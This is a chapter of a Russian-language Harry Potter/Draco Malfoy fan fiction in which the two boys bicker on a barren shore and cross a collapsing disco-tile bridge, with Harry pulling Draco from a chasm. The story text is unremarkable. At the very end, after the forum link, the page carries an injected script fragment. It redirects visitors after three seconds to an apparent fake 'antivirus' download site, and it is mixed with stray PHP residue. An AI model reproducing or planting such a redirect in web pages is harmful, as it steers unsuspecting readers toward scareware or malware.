Ничья земля

Автор: Umbridge
Пайринг: Гарри Поттер/Драко Малфой
Рейтинг: NC-17
Жанр: action/agnst/romance
Саммари: Добро пожаловать! Вас приветствует НИЧЬЯ ЗЕМЛЯ! Забудьте все, чем вы были раньше. Здесь нет власти, но есть правила. Соблюдайте их - и вы выиграете!
Предупреждение: гет в 10 и 11 главах. ГП/ДУ, ДМ/НЖП, АУ 7 книги

Глава 5. Мост в стиле диско.

(Глава, в которой судьбу героев решает скорость, Гарри снова спасает Драко, а Драко на собственном опыте узнает кое-что о маггловской музыке)

Проснувшись, Драко ощутил острое желание сходить по нужде. Поднявшись, он направился в сторону единственно возможного укрытия. Ему не хотелось, чтобы Поттер увидел его. Встав за каменной глыбой, мальчик посмотрел на воду. Идея остаться на Ничьей земле навсегда постепенно становилась навязчивой. «Надо показать себя Поттеру с самой выгодной стороны. Это будет мой маленький план. Гарри узнает меня получше, и может быть, тоже не захочет возвращаться», - с волнением решил Драко.  Сполоснув руки, он, вспомнив давнюю хогвардскую привычку, пригладил волосы и вышел.

Гарри проснулся с чувством, что ему не по себе. «Я разбит», - подумал он, открывая глаза. Перед его взором расстилалось желтое бледное небо. Заставив себя сесть, он надел очки и огляделся. Вокруг не осталось и намека на вчерашнее  очарование. Впереди накатывали на берег волны простиравшегося до горизонта моря. Оно, отражая небо, напоминало желе, казалось безликим и отстраненным. Галечный пляж, разрезанный на куски высокими черными камнями, дальше к востоку кончался, утыкаясь в подножье горной гряды. Там, над скалистым берегом кружили невиданные существа, похожие издали на птиц. Тут Гарри заметил отсутствие некой важной детали пейзажа. Он поднял мешок Дамблдора. Этот мешок еще хранил тепло малфоевского уха, прижимавшегося к нему, но самого Малфоя не было видно. Не успел Поттер подумать: «И где он? Куда запропастился?» - как Драко появился из-за цепи высоких камней, сползавших прямо  в воду.

- Малфой… - Гарри с досадой покачал головой, - что ты там делал?

- Не скажу, - капризным тоном произнес слизеринец, и тут же ухмыльнулся, - волновался?

Он подошел к расстеленному на земле плащу и сел.

- Да, - резко ответил Гарри, вставая.

- Тогда дай поесть. Не жадничай, Потти, - сказал Драко, глядя на него снизу вверх.

- А ты волшебное слово знаешь, Малфой? – холодно поинтересовался гриффиндорец, направляясь в сторону камней.

- Акцио? Круцио? Авада Кедавра? Ах нееет, это целых два слова! Ха – ха! – слизеринец захихикал над собственной шуткой, но тут же осекся, наблюдая за живым воплощением каменного молчания -  удаляющимся Гарри.

- Какой мрачный! – помолчав минуту, повысил голос Драко, глядя, как тот справляет малую нужду, - снились плохие сны?

Гарри молча поправил мантию.

- Малфой, полей мне на руки, - попросил он, вернувшись к месту ночевки.

- Описал ручки, Потти? Что же ты так неаккуратно? – ехидно заметил Драко.

- Малфой, пожалуйста, полей, - с нажимом повторил Гарри.

- Хорошо, хорошо. С тобой шутки плохи, ненормальный, - пробормотал слизеринец, выполняя просьбу. Гарри прижал влажные руки к лицу. Это бодрило.

- Малфой, - сказал он со вздохом, садясь рядом и доставая из мешка еду и воду, - Давай поедим в тишине.

- В тишине? – обиженно переспросил Драко. – Хорошо…

Он замолчал, с преувеличенным вниманием разглядывая скудное угощение.

- Отлично, - сказал Гарри и принялся за еду. Они ели молча. Море, будто на вдохе и выдохе, поднималось и опадало. Это был единственный звук, доносившийся до их ушей. Гриффиндорец жевал сэндвич, задумчиво глядя на камешки рядом со своим коленом. «Неужели здесь совсем ничего не растет? » - размышлял он, - «Какое странное место. При том, что оно унылое и безликое, вчера я был очарован им. Возможно, тут есть некая магия, заставившая меня видеть и чувствовать что-то, мне не свойственное. Как еще можно объяснить мое внезапное влечение к Малфою? Как будто тут все так и норовит заставить меня обратить на него внимание», - он поднял глаза на Драко. Тот с нарочито равнодушным видом ел грибной пирог и смотрел вдаль, на цепь серых камней. «Малфой…» - с раздражением подумал Гарри, - «Что за бред…».

- Поттер, в чем дело? – поднял брови предмет его размышлений, заметивший, что гриффиндорец наблюдает за ним, - наглядеться не можешь? Нравлюсь?

- Нравишься? – Гарри недоверчиво покачал головой, - снова шутишь?

- Отчего же… Я вполне серьезен, - пожал плечами Драко.

- Малфой, мой плащ, - Гарри указал глазами на пальцы слизеринца. Тот вытирал их о подкладку.

- Меняешь тему, Потти? – ехидно ухмыльнулся Драко. Он сделал глоток из фляги, поглядывая поверх нее на гриффиндорца. Тот тяжело вздохнул:

- Да, если хочешь. А теперь, может быть, ты встанешь и позволишь мне одеться?

Драко посмотрел на него и широко улыбнулся:

- Ну, конечно же, дорогой мой Поттер, разве я могу тебе помешать,- с этими словами он поднялся и, сложив руки на груди, застыл рядом.

- Допустим, если бы ты решил раздеться, то я бы, естественно, задумался, стоит ли позволять тебе делать это… -  сказал слизеринец, глядя, как Гарри застегивает крючки.

-  Не знаю, в курсе ли ты, но из-за тебя я только что потерял десять минут своей жизни, - ответил мальчик, привязывая к поясу мешок Дамблдора.

- Потти сострил! Жаль, никто кроме меня не слышал, - ухмыльнулся Драко.

Гарри выпрямился и с усмешкой посмотрел на него:

- Тебя вполне достаточно, хорек.

- Вонючка, - ответил тот.

- Остановимся на этом. Предлагаю пойти на восток.

- Да хоть на запад. Какая разница, если везде все одно и  то же, - отмахнулся слизеринец.

- Там горы. Все-таки некоторое разнообразие, - резонно заметил Гарри. Не дожидаясь ответа, он повернулся и направился в сторону горной гряды. Он прекрасно знал, что Драко придется идти за ним. И не ошибся.

- А кто сказал, что разнообразие – это хорошо? – бормотал светловолосый волшебник, шагая чуть позади, - да и горы с темными пещерами… В прошлый раз я не видел в них ничего такого, что могло бы заставить меня вернуться туда…

- Уж не боишься ли ты, Малфой? – спросил Гарри.

- Я? – Драко выше задрал подбородок, - нет. А что?

- Ничего.

Невозможно было точно определить, сколько часов шли юные маги. Один раз они остановились передохнуть, потом снова отправились в путь. Когда начало смеркаться, дорога пошла в гору. Чем дальше, тем круче становился подъем. Скоро под их ногами вместо песка заскрипели камни, вокруг возвышались темные силуэты далеких вершин. Тропа становилась уже. Она вилась по склону отвесной скалы, и каждый раз, когда вниз летели куски щебня и земля, Драко чувствовал, как на лбу выступает испарина и хочется повернуть назад, но это было невозможно, так что он покорно тащился дальше.

            Стемнело, и продолжать путь становилось все трудней. Но каменистый выступ, по которому они двигались, не давал возможности устроить привал.

- Поттер, - подал голос слизеринец, старавшийся идти ближе к каменной стене и не смотреть в пропасть, - мы собираемся свалиться вниз от усталости?

- Ты меня спрашиваешь? – удивился Гарри. Он продолжал идти, внимательно глядя под ноги.

- Здесь есть кто-то еще? - с деланным изумлением спросил Драко.

- Да. А ты разве не видишь? – холодно поинтересовался Гарри. – Я понимаю, что ты не можешь молчать, но, пожалуйста, внимательно смотри, куда идешь.

- Ты обо мне заботишься! Хотел бы сказать тебе спасибо, да не буду, - устало произнес Драко и замолчал. Сил не хватало даже на разговоры.

Однако тишина была недолгой. Когда мальчики в очередной раз преодолели поворот, то вышли к расщелине, мостом через которую служила ярко освещенная, поделенная на разноцветные квадраты площадка.

- Диско… - тихо произнес Гарри, задумчиво глядя на представшую перед ними картину.

- Что? – подошедший сзади слизеринец посмотрел на него, как на умалишенного.

- Это напоминает мне пол на танцплощадке в дискоклипах…

- Где? – воскликнул Драко, возмущенно поднимая брови. Гриффиндорец повернулся к нему, озадаченно посмотрел пару секунд, после чего мотнул головой:

- Неважно… Это у магглов… Было такое течение в музыке… Диско…

- Магглы, - скривился слизеринец по инерции.

- Магглы, - согласился Гарри, потом снова посмотрел на разноцветные квадраты каждый из которых был примерно полтора на полтора фута, - нам надо идти вперед. Другого выхода я не вижу.

- Может быть, тут тоже есть какие-нибудь метлы, нет? – с надеждой спросил Драко, рассматривая цветные плиты, висящие в воздухе без опоры.

- Насколько я успел заметить, тут нет ничего, кроме этой танцплощадки. Нам просто надо ее пересечь.

- Пересечь? – слизеринец зло ухмыльнулся, - ну что ж, вперед, отважный Мальчик-Который-Выжил, покажи мне пример.

- Малфой, ты трус! – Гарри с презрением посмотрел на него.

- Нет, я не трус. Просто не хочу идти первым, - ответил Драко.

- Да какая разница! Если погибну я, то и ты погибнешь тоже. – Напомнил гриффиндорец.

- Ты не погибнешь, на то ты и «бла бла бла который выжил и так далее», - пожал плечами Драко.

- Ну, хорошо, - сказал Гарри с досадой, - я в отличие от тебя не боюсь. - С этими словами он быстро пошел вперед, стараясь не думать о темном провале под ногами. Над головой сгущались сумерки. Ночь ложилась на горы, а на мосту было светло. Красные, синие, желтые квадраты освещали путь. «Не хватает только зеркального шара сверху», - подумал гриффиндорец. К его удивлению, на противоположную сторону он добрался без происшествий.

- Иди сюда! – крикнул он, помахав Драко рукой.

Тот вздохнул и медленно сделал шаг, потом другой, глядя вверх, на темное небо, на луну, застывшую над его головой. Однако, преодолев десять квадратов, слизеринец остановился, внезапно осознавая, что стоит на светящейся, висящей в воздухе плите над пропастью неизвестно сколько сотен миль глубиной. Эта мысль буквально парализовала его. Драко замер, не в силах пошевелится.

- Малфой! – крикнул Гарри, - что случилось?

Его голос заставил слизеринца очнуться.

- Я не могу… - начал он, но в следующую секунду почувствовал, как опора уходит из-под ног. Не успел он понять что происходит, как каким-то чудом уже лежал на животе на соседнем квадрате, а ноги болтались в пустоте. Казалось, страх придал Драко сил. Подтянувшись, он быстро вылез на поверхность и, с трудом поднявшись с колен, в ужасе посмотрел на Поттера. Тот что-то кричал, но Драко не слышал.

Гарри видел, что слизеринец никак не реагирует на окрики. Но надо было как-то обратить на себя его внимание. В противном случае за их победу в испытании гриффиндорец не ручался. Он заметил, что перед тем как провалиться вниз, плита начала мигать. И сейчас это происходило с той, на которой находился Малфой. Гарри поднял с земли камешек и швырнул в него.

Когда в лоб Драко попало что-то твердое, мальчик пришел в себя. Услышав слова школьного врага: «Малфой, прыгай вперед!», он, не раздумывая, подчинился, и в следующее мгновение синий квадрат, на котором он стоял секунду назад, рухнул вниз.

Драко обернулся, проследив безумным взглядом падение.

- Поттер! Что мне делать!? – закричал он.

- Черт! – Гарри сделал шаг к краю обрыва, - Малфой, вправо! Быстро!

Едва слизеринец отступил вправо на зеленый квадрат, как красный исчез в провале.

- Быстрее, еще быстрее, вперед и влево!

Драко подчинился, не думая. Он прыгнул на желтую плиту, с трудом удержав равновесие. Даже не успел перевести дух, как услышал:

- Вперед, - и снова прыгнул.

- Вправо…

Драко едва успевал касаться ногами квадратов, как они исчезали, и он прыгал снова.

- Малфой, вперед, - кричал Гарри. Плиты рушились все быстрее, их становилось все меньше. Они осыпались справа и слева, начинали мигать, а потом исчезали в пропасти.

- Малфой, - проорал гриффиндорец, понимая, что выхода нет, - беги!

Слизеринец побежал. И вот когда он был в шаге от края скалы, последний квадрат растворился под ногами. Оттолкнувшись, Малфой упал грудью на скользкую землю, чувствуя, что съезжает в пропасть. Он начал скрести по камню, сдирая ногти, пытаясь удержаться.  Сейчас, в этой безумной борьбе он был животным, спасающим свою жизнь. Извивающимся, карабкающимся животным. Еще несколько отчаянных мгновений, и вдруг что-то рвануло Драко  вверх, и он упал на камни.

Прошло несколько секунд, прежде чем Гарри понял и оценил  ситуацию. Повинуясь молниеносным командам даже не разума, а инстинкта, он бросился к обрыву, схватил Малфоя за руки и вытащил на поверхность. Гарри так резко рванул его на себя, что оступился и упал на спину. Больно ударившись о камни, он судорожно вздохнул, но нашел в себе силы встать на корточки.

- Ты как? – тяжело дыша, спросил он у лежавшего на животе Драко.

- Я? – отозвался тот, с трудом становясь на колени. В голове, как в раковине, шумело море.

- Ясно, - вздохнул Гарри, поднимаясь, - давай помогу.

Он взял Драко под руку. Тот не сопротивлялся. Выпрямившись, слизеринец посмотрел назад. Там, за их спинами, зиял темный провал, оставшийся на месте моста. Закружилась голова. Тело словно наполнил холодный воздух. Драко осознал, что действительно только что чуть не умер. Перед его внутренним взором мелькали картины: он скребет ногтями по камням, а потом срывается. Несколько секунд он испытывает панический ужас. Потом что? Его сердце остановится? Успеет ли он подумать, что спастись уже нельзя, и это конец? Виски сжало тисками, глаза защипало. Драко отвернулся, сосредоточенно поправляя мантию кровоточащими пальцами.

- Малфой… - Гарри внимательно смотрел на побелевшие губы слизеринца.

- Да? – прошелестел тот, стараясь скрыть дрожь в голосе.

- Ты в порядке или нет? – взволнованно спросил Гарри.

- Да, - отрешенно ответил Драко.

Понятно, - кивнул Гарри. «Как будто я не вижу, что ты готов разрыдаться от страха» - подумал он устало, и сердце сдавило что-то, похожее на жалость. Гарри лучше, чем кто-либо, знал, что такое – быть на волосок от смерти.

- Поттер, не смотри на меня так… – процедил Драко. Голова разболелась. Было гадко от осознания того, что гриффиндорец снова спас его.

- Идем, - выдавил Гарри, чувствуя, как болит спина.

- И я прямо сейчас брошусь выполнять твои команды, - огрызнулся Драко, беря реванш за свое безграничное доверие несколько минут назад.

Гарри пожал плечами и, повернувшись к нему спиной, зашагал прочь. Воспользовавшись тем, что Поттер не видит, Драко облизал ободранные пальцы и пошел следом.

Предыдущая глава   Оглавление   Следующая глава

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>